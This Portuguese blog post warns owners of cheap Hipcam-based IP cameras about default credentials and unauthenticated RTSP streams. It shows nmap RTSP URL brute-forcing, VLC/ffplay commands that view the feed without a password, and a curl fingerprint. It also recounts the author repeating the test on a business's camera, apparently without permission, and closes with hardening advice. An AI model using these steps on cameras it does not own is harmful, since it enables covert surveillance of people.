CameraIP fique de olho você tambem

AS INFORMAÇÕES CONTIDAS NESTE ARTIGO SÃO EXCLUSIVAMENTE PARA USO E PROPOSITO EDUCACIONAL NÃO NOS RESPONSABILIZAMOS PELO MAL USO DAS INFORMAÇÕES AQUI CONTIDAS, E SIM ORIENTAR E ALERTAR OS USUÁRIOS QUE POSSUEM O EQUIPAMENTO AOS RISCOS.

 

Em minhas viagens a trabalho e passeios pela cidade onde moro é com frequência que vejo lanchonetes, barzinhos, quiosques, shoppings, lojas, comércios em geral utilizando as IPCamera , Câmera IP, Câmera Wifi, Câmera Wireless, Câmera PTZ, Câmera Wifi HD e diversos outros nomes que se encontra nos anúncios de AliExpress e Mercado Livre.

Eu acabei adquirindo uma, Câmera IP (Genérica) única descrição que tive foi o modelo RG-IP02 na caixa e um folheto de 2 paginas apontando um link para China onde poderia realizar download de aplicações para iOS, Android e PC, o que desperta o interesse nesses equipamentos é o baixo custo ficando inferior a R$200,00.

Elas são cheias de recursos possuem conexão Wifi, Ethernet, Pan/Tilt 270º e 90º, sensor LDR, IR led, microfone e toda configuração via web acessando uma pagina em um webserver dentro da Câmera IP. A configuração é simples, escaneando a rede e encontrando o SSID da sua rede e inserindo a senha já pode acessar remotamente, no máximo alterar a porta 80 para uma porta que não seja de serviço e que o provedor não bloqueie, por exemplo, 7780 e poderá acessar remotamente.

No caso da minha Câmera IP e mais uma que verifiquei o modo de autenticação utilizado é o AUTH BASIC que por padrão possui as seguintes senhas:

admin:admin  – Controle Total

user:user          – Visualização e Manipulação da Câmera

guest:guest      – Apenas Visualização

 

Recomento que troque a senha dos três usuários não somente do admin, fazendo isso você esta tranquilo e seguro. #SQN!

Estas câmeras possuem N recursos habilitados por padrão, eu desabilitei alguns como FTP, DDNS, Acesso Remoto, SMTP(Envia e-mails notificando movimento em dado momento agendado para monitoramento).

Por padrão, sem você saber o RTSP já vem habilitado e esta rodando sobre a porta 554(padrão), até ae tudo bem pois é utilizado para acessar as câmeras pelo software do PC ou Celular, se não fosse pelo detalhe que é possível estabelecer comunicação RTSP sem usuário e senha, vamos ver passo a passo agora desta analise.

IP Notebook: 10.11.12.3

IP Camera: 10.11.12.100

Primeiro, realizando um scanner com NMAP utilizando o script rtsp-url-brute para encontrar as URL’s do RTSP.

$ nmap --script rtsp-url-brute -p 554 10.11.12.100
Starting Nmap 6.00 ( http://nmap.org ) at 2017-03-02 19:50 BRT
Nmap scan report for 10.11.12.100
Host is up (0.044s latency).

PORT STATE SERVICE
554/tcp open rtsp
| rtsp-url-brute:
| Discovered URLs
|  rtsp://10.11.12.100/1.AMP
|_ rtsp://10.11.12.100/1/stream1

Nmap done: 1 IP address (1 host up) scanned in 20.40 seconds

Encontrada as url’s, iremos utilizar um software para streaming de áudio/vídeo, podemos utilizar VLC, FFMPEG ou Gstreamer-Launch:

$ vlc --started-from-file rtsp://10.11.12.100:554/1/stream1

$ gst-launch-1.0 rtspsrc location=rtsp://10.11.12.100:554/1/stream1

$ ffplay rtsp://10.11.12.100:554/1/stream1

E teremos acesso a streaming da câmera como abaixo:

 

Repliquei os testes em um estabelecimento que frequento bastante, onde só possuía acesso a internet local, onde estava também a CameraIP e a partir disso dei inicio ao scanner da rede, encontrar o IP com a porta 554 e replicar os testes onde também obtive exito.

A “brecha” só ocorre se uma opção chamada RTSP Permission Check estiver configurado como “off” em Settings > Network > Network.

Mas não se preocupe, consegui testes com outras câmeras IP que estavam com a “554/tcp” aberta e não revelou a URL e foi solicitado o usuário e senha nos testes, nos meus testes as falhas ocorrem as que possuem a seguinte descrição no Server Hipcam RealServer/V1.0, pode-se verificar com o comando curl, como abaixo:

 

$ curl -I rtsp://10.11.12.100:554
RTSP/1.0 200 OK
CSeq: 1
Server: Hipcam RealServer/V1.0
Public: OPTIONS,DESCRIBE,SETUP,TEARDOWN,PLAY,SET_PARAMETER,GET_PARAMETER

 

Dicas para melhorar a segurança

 

  • Altere a porta padrão do webserver 80
  • Altere todos os usuarios e senhas dos perfis admin, user e guest
  • Configure o RTSP Permission Check para “yes”, forçando a utilizar o usuario/senha cadastrado
  • Desabilite o que não irá usar ou não conheça como P2P, ONVIF, DDNS e demais da guia Network.

 

Continuarei bisbilhotando esta câmera onde pretendo obter privilégios sobre o sistema sem ter que “desmontar” o produto ou conectar um cabo serial para console, conforme ir avançando e novas descobertas irei publicar aqui no blog.

A motivação para isso tudo? É a proporção destes produtos em nossas residenciais e locais que frequentamos e muitas vezes pela facilidade na instalação/configuração e passar a funcionar deixa para trás detalhes de configuração que pode comprometer sua privacidade e de sua família, agora imagina isso em Câmeras IP, Babas Eletrônicas e diversos outros gadgets!

Espero que tenham gostado e quem possuir uma destas Câmeras IP atente a estes detalhes na configuração.

Até a próxima!

 

Share Button

CC BY-NC-SA 4.0 CameraIP fique de olho você tambem by Cleiton Bueno is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.